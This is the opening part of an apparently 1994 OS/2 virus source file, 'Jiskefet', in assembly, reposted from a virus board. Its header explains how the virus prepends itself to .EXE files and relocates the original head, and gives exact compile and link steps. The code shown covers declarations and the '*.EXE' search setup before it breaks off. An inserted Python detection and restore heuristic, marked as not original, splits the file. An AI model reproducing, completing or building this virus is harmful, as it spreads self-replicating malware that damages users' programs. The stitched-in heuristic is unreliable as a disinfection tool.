jiskefet.asm
Assembly Source File | 1994-04-30 | 7KB | 131 lines
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
--------- Rippppppped Off The NuKNET For Your Enjoyment...-----------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
comment #
JISKEFET: a non-resident direct-action OS/2 virus
Disclaimer: This file is only for educational purposes. Do not abuse it!
The author takes no responsibility for anything anyone does with this file.
How does this virus work? Like most non-resident viruses, it first infects
other programs and then runs the original program. It infects programs by
copying the first part of the program (with the same size as the virus) to
the end of the program and then overwriting the beginning with the virus. When
an infected program is executed, the virus will make a copy of the infected
program and disinfect it. It will then spawn the disinfected copy. This is
perhaps not a very elegant method. It would be nicer if the virus could just
disinfect the current program and spawn that one. But OS/2 doesn't allow a
program that is being executed to be altered.

The proper way to compile this virus is like this: first, just compile it.
Then check the size of the newly created exe file. It should be the same as
the value for VIRLEN below. If not, change the value for VIRLEN and compile
again. Unfortunately, I don't know of a way to tell the compiler what the size
of an EXE file will be after compilation. Also check out the offset of the
'MK' signature in the EXE file. It should be at the offset MKOFF. You might
have to change this one too. To generate an exact copy of the original virus,
use MASM.EXE v5.0 and LINK386.EXE v2.00.000.
COMPILE.BAT:
...........................................................................
masm.exe /Zi %1.asm;
link386.exe /exepack %1.obj,,,doscalls.lib,%1.def
...........................................................................
JISKEFET.DEF:
...........................................................................
name Jiskefet windowapi ;A virus must have a name. This one is
;dedicated to the people of 'Jiskefet',
;the funniest TV program in the Netherlands
;These guys are really excellent!
;'windowapi' means that this virus will be
;compiled into a P.M. application.
protmode ;It will run in protected mode.
stacksize 8192 ;Yes, the virus needs some stack.
...........................................................................
The file doscalls.lib should be in the OS/2 directory. Copy it to your work
directory or enter the full pathname in compile.bat.
To compile this file type: compile jiskefet
#
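A defender-side layout check for the infection scheme described in the header comment above, added here as an example (it is not part of the original file). It assumes OS/2 executables begin with the DOS `MZ` stub and that the `MK` bytes at `MKOFF` sit inside the prepended body of every affected file; the function names and the sample data are constructed for illustration.

```python
import sys

VIRLEN = 2048   # size of the prepended body (VIRLEN equ 2048d in the source)
MKOFF = 0x400   # offset of the 'MK' bytes (MKOFF equ 400 under .radix 16)

def looks_infected(data: bytes) -> bool:
    """Heuristic: does the file match the layout the header comment describes?"""
    if len(data) < 2 * VIRLEN:       # prepended body plus relocated host head
        return False
    head, tail = data[:VIRLEN], data[-VIRLEN:]
    return (head[:2] == b"MZ"                       # assumption: EXE stub magic
            and head[MKOFF:MKOFF + 2] == b"MK"      # marker bytes at MKOFF
            and tail[:2] == b"MZ")                  # host's original first bytes

def restore(data: bytes) -> bytes:
    """Put the saved first VIRLEN bytes back at offset 0 and drop the tail copy."""
    if not looks_infected(data):
        raise ValueError("file does not match the described layout")
    return data[-VIRLEN:] + data[VIRLEN:-VIRLEN]

def constructed_sample():
    """Build a dummy host and a dummy file with the same layout (no real code)."""
    host = b"MZ" + bytes(range(256)) * 20            # constructed 5122-byte host
    body = bytearray(VIRLEN)                         # zero-filled stand-in body
    body[:2] = b"MZ"
    body[MKOFF:MKOFF + 2] = b"MK"
    return host, bytes(body) + host[VIRLEN:] + host[:VIRLEN]

if __name__ == "__main__":
    for path in sys.argv[1:]:                        # report only, never modifies
        with open(path, "rb") as fh:
            print(path, "SUSPECT" if looks_infected(fh.read()) else "no match")
```

The three checks are a heuristic, so a legitimate file could match them; apply `restore` only to a copy and verify the result before replacing anything.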
;==========================================================================
.286 ;80286 opcodes can be used.
.radix 16 ;All numbers are hexadecimal
;by default.
VIRLEN equ 2048d ;This will be the size of the
;compiled virus.
MKOFF equ 400 ;At this offset in the EXE
;will be the 'MK' signature
_srec struc ;Structure with information
cdate dw ? ;about file, returned by the
ctime dw ? ;DosFindFirst and DosFindNext
adate dw ? ;functions.
atime dw ?
wdate dw ?
wtime dw ?
fsize dd ?
falloc dd ?
fattr dw ?
fcount db ?
fname db 100 dup (?)
_srec ends
extrn DosFindFirst:far ;These external kernel
extrn DosFindNext:far ;functions are used by the
extrn DosFindClose:far ;virus.
extrn DosOpen:far
extrn DosClose:far
extrn DosRead:far
extrn DosWrite:far
extrn DosChgFilePtr:far
extrn DosNewSize:far
extrn DosGetEnv:far
extrn DosExecPgm:far
extrn DosExit:far
extrn DosDelete:far
DGROUP group _DATA
_DATA segment word public 'DATA'
;Variables used by DosFindFirst
;and DosFindNext functions:
filename db '*.EXE', 0 ; Filenames to search for.
dirhan dw ? ; Handle.
sbuf _srec <> ; Struct. with returned info.
srchcnt dw ? ; Number of files to search.
;Variables used by DosOpen:
faction dw ? ; Open mode.
fhandle dw ? ; Handle.
fhandle2 dw ? ; Handle.
;Variables used by DosRead
;and DosWrite:
rlen dw ? ; Number of read bytes.
wlen dw ? ; Number of written bytes.
;Variables used by
;DosChgFilePtr:
new_off dw ?, ? ; New offset.
;Variables used by DosGetEnv:
envseg dw ? ; Segment of environment.
cmdoffs dw ? ; Offset of arguments in env.
;Variables used by DosExecPgm:
objbuf db (40) dup (?) ; Buffer for error-info.
retcode dw ?, ? ; Returns exit-code.
;Other variables:
NE_buf db (40) dup (?) ; Buffer for NE header.
namebuf db (100) dup (?) ; New filename for spawning.
buffer db (VIRLEN) dup (?) ; Main buffer.
_DATA ends
;--------------------------------------------------------------------------
; Main program.
;--------------------------------------------------------------------------
_TEXT segment word public 'CODE'
assume cs:_TEXT, ds:DGROUP